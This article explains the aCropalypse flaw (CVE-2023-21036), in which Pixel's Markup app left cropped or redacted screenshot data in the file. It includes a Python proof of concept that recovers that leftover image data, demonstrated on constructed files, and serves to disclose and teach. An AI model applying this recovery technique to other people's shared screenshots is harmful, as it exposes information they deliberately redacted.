aCropalypse, a bug in Pixel devices that allows cropped screenshots to be partially restored


If exploited, the flaw allows an attacker to recover sensitive information that the user believed had been cropped or redacted out of a screenshot.

Details were released of a vulnerability (already cataloged as CVE-2023-21036) in Markup, the app Google Pixel smartphones use to crop and edit screenshots: it allows partial restoration of the cropped or edited content.

The engineers Simon Aarons, who found the bug, and David Buchanan, who wrote the proof-of-concept recovery tool, named it aCropalypse and noted that "this bug is bad" for anyone concerned about their privacy.

That means that if someone gets hold of your cropped image, they can try to bring back the part that appears to be missing. If the image was redacted by scribbling over certain areas, those areas may be visible in the restored image. This is bad for privacy.

The problem shows up when editing PNG images in Markup. When the modified image is saved, it is written over the previous file without truncating it, so the resulting file consists of the new, smaller image followed by the tail of the original file, and that tail still holds the original's compressed pixel data. A viewer stops at the new image's IEND chunk, which is why the leftover data is invisible yet still present in the file.

The problem is classified as a vulnerability because a user can publish an edited image after removing sensitive data while that data actually remains in the file, even though it is not visible during normal viewing. To recover the leftover data, the acropalypse.app web service was launched and an example Python script was published.

The vulnerability has been present since the Google Pixel 3 series launched in 2018, on firmware based on Android 10 and later. The issue was fixed in the March 2023 Android firmware update for Pixel smartphones.

"The end result is that the image file is opened without the [truncated] flag, so that when the cropped image is written, the original image is not truncated," Buchanan said. "If the new image file is smaller, the end of the original is left behind."

The parts of the file that should have been truncated turned out to be recoverable as images after some reverse engineering of the zlib compression library's stream format, which Buchanan says he managed "after a few hours of playing around". The end result is a proof of concept that anyone with an affected Pixel device can test for themselves.

The issue is believed to stem from an undocumented behavior change in the ParcelFileDescriptor.parseMode() method. Before Android 10, the "w" (write) mode caused an existing file to be truncated when it was opened for writing; since Android 10, truncation has to be requested explicitly with the "wt" (write, truncate) mode, and with plain "w" the tail of the existing file is no longer removed when it is rewritten.
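The three mechanisms the article describes, the "w" mode that writes the new file over the old one without truncating it, the original's compressed data surviving behind the edited image's IEND chunk, and resuming zlib's deflate stream from the middle of the leftover, can be reproduced end to end. The following script is an added example, not Markup's code and not the published acropalypse tool: it builds a small constructed PNG, overwrites it with a smaller one both without and with O_TRUNC (the "w" versus "wt" behaviour), detects the trailer, and recovers the original's remaining scanline bytes. The image sizes, the pseudo-random pixels, the band-by-band full flush that makes the recovered data exactly checkable, and the all-zero preset dictionary are assumptions of this demo; a real Markup output has no such flush, so the block boundary the search finds lands at an arbitrary bit offset.

```python
import os
import random
import struct
import tempfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ZERO_WINDOW = bytes(32 * 1024)  # stands in for the 32 KiB deflate window that was overwritten

def chunk(ctype, data):
    """One PNG chunk: big-endian length, 4-byte type, data, CRC-32 over type + data."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))

def make_png(width, height, rows_per_band=8, idat_size=1000, seed=1):
    """8-bit RGB PNG of seeded pseudo-random pixels (constructed data); returns (png, raw scanlines)."""
    rng = random.Random(seed)
    stride = 1 + 3 * width  # filter-type byte (0 = None) followed by the RGB samples
    raw = b"".join(b"\x00" + bytes(rng.getrandbits(8) for _ in range(3 * width)) for _ in range(height))
    comp, stream = zlib.compressobj(9), b""
    for off in range(0, len(raw), rows_per_band * stride):
        # Demo assumption: a full flush per band, so each band starts a fresh block (real encoders don't).
        stream += comp.compress(raw[off:off + rows_per_band * stride]) + comp.flush(zlib.Z_FULL_FLUSH)
    stream += comp.flush()  # final block plus the 4-byte Adler-32 that closes a zlib stream
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # bit depth 8, colour type 2 = RGB
    # IDAT chunk boundaries are unrelated to band boundaries, as with real encoders.
    idats = b"".join(chunk(b"IDAT", stream[i:i + idat_size]) for i in range(0, len(stream), idat_size))
    return PNG_SIG + chunk(b"IHDR", ihdr) + idats + chunk(b"IEND", b""), raw

def overwrite_in_place(path, original, edited, truncate):
    """Save `original`, then write `edited` over it. Android 10+ mode "w" opens O_WRONLY without O_TRUNC,
    so the original's bytes beyond len(edited) survive; "wt" adds O_TRUNC. Returns what is now on disk."""
    with open(path, "wb") as f:
        f.write(original)
    fd = os.open(path, os.O_WRONLY | (os.O_TRUNC if truncate else 0))
    try:
        view = memoryview(edited)
        while view:  # write from offset 0 until every byte of the edit is on disk
            view = view[os.write(fd, view):]
    finally:
        os.close(fd)
    with open(path, "rb") as f:
        return f.read()

def split_at_iend(png):
    """Walk the chunks like a decoder and return (image, trailer); decoders stop at IEND, so the trailer is invisible."""
    assert png.startswith(PNG_SIG), "not a PNG"
    pos = len(PNG_SIG)
    while pos + 8 <= len(png):
        (length,), ctype = struct.unpack(">I", png[pos:pos + 4]), png[pos + 4:pos + 8]
        pos += 12 + length  # length + type + data + CRC
        if ctype == b"IEND":
            return png[:pos], png[pos:]
    raise ValueError("no IEND chunk")

def trailer_idat(trailer):
    """Concatenate every complete, CRC-valid IDAT chunk in the trailer; the chunk the cut falls in is skipped."""
    parts, pos = [], 0
    while (p := trailer.find(b"IDAT", pos)) != -1:
        pos = p + 4
        if p < 4:
            continue
        (length,) = struct.unpack(">I", trailer[p - 4:p])
        data, crc = trailer[p + 4:p + 4 + length], trailer[p + 4 + length:p + 8 + length]
        if len(data) == length and len(crc) == 4 and struct.unpack(">I", crc)[0] == zlib.crc32(b"IDAT" + data):
            parts.append(data)
            pos = p + 8 + length
    return b"".join(parts)

def inflate_from_unknown_offset(data):
    """Resume a raw deflate stream whose start is gone. Blocks are not byte-aligned, so try every bit offset and
    accept the first that zlib parses through the final block (eof) with exactly the 4 Adler-32 bytes left over.
    ZERO_WINDOW is preset as the dictionary so back-references into the lost window give zeros instead of errors."""
    n = int.from_bytes(data, "little")  # deflate is LSB-first, so bit i of the stream is bit i of n
    shifted = [(n >> s).to_bytes(len(data), "little") for s in range(8)]
    for byte_off in range(len(data)):
        for s in range(8):
            d = zlib.decompressobj(wbits=-15, zdict=ZERO_WINDOW)  # -15: raw deflate, no zlib header
            try:
                out = d.decompress(shifted[s][byte_off:])
            except zlib.error:
                continue
            if d.eof and out and len(d.unused_data) == 4:
                return 8 * byte_off + s, out  # (bit offset into `data`, recovered scanline bytes)
    return None

def demo():
    """Save a 48x48 'screenshot', overwrite it with a 24x24 'crop' both ways, detect and recover the leftover."""
    original, raw = make_png(48, 48, seed=1)
    edited, _ = make_png(24, 24, seed=2)
    with tempfile.TemporaryDirectory() as tmp:
        leaky = overwrite_in_place(os.path.join(tmp, "leaky.png"), original, edited, truncate=False)
        fixed = overwrite_in_place(os.path.join(tmp, "fixed.png"), original, edited, truncate=True)
    leaky_trailer, fixed_trailer = split_at_iend(leaky)[1], split_at_iend(fixed)[1]
    hit = inflate_from_unknown_offset(trailer_idat(leaky_trailer))
    return {"raw": raw, "original_len": len(original), "edited_len": len(edited), "leaky_len": len(leaky),
            "fixed_len": len(fixed), "leaky_trailer_len": len(leaky_trailer), "fixed_trailer_len": len(fixed_trailer),
            "bit_offset": None if hit is None else hit[0], "recovered": b"" if hit is None else hit[1]}

if __name__ == "__main__":
    print({k: (len(v) if isinstance(v, bytes) else v) for k, v in demo().items()})
```

Running it prints the file and trailer sizes (zero trailer for the truncated file), the bit offset at which the deflate stream could be resumed, and how many raw scanline bytes came back. On a real file the bytes that copy from the overwritten window come back as zeros and only the data after the first block boundary inside the leftover is recoverable; turning it back into a picture also needs the original width and pixel format, which the edited file's IHDR no longer carries.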

In short, the "aCropalypse" flaw allows someone to take a PNG screenshot cropped in Markup and undo at least some of the edits made to it. It is easy to imagine scenarios in which a bad actor could abuse that ability: if a Pixel owner used Markup to redact an image that included sensitive information about themselves, someone could exploit the flaw to reveal that information.

It is worth mentioning that Google patched aCropalypse in its March Pixel security update (just before details of the vulnerability were released):

"All well and good for the future: you can now crop, redact, and share without fear that your future images can be recovered, but that does nothing for the vulnerable screenshots that have already been shared, uploaded to Discord, etc."

Finally, if you are interested in learning more about the vulnerability, you can consult the original publication at the following link.

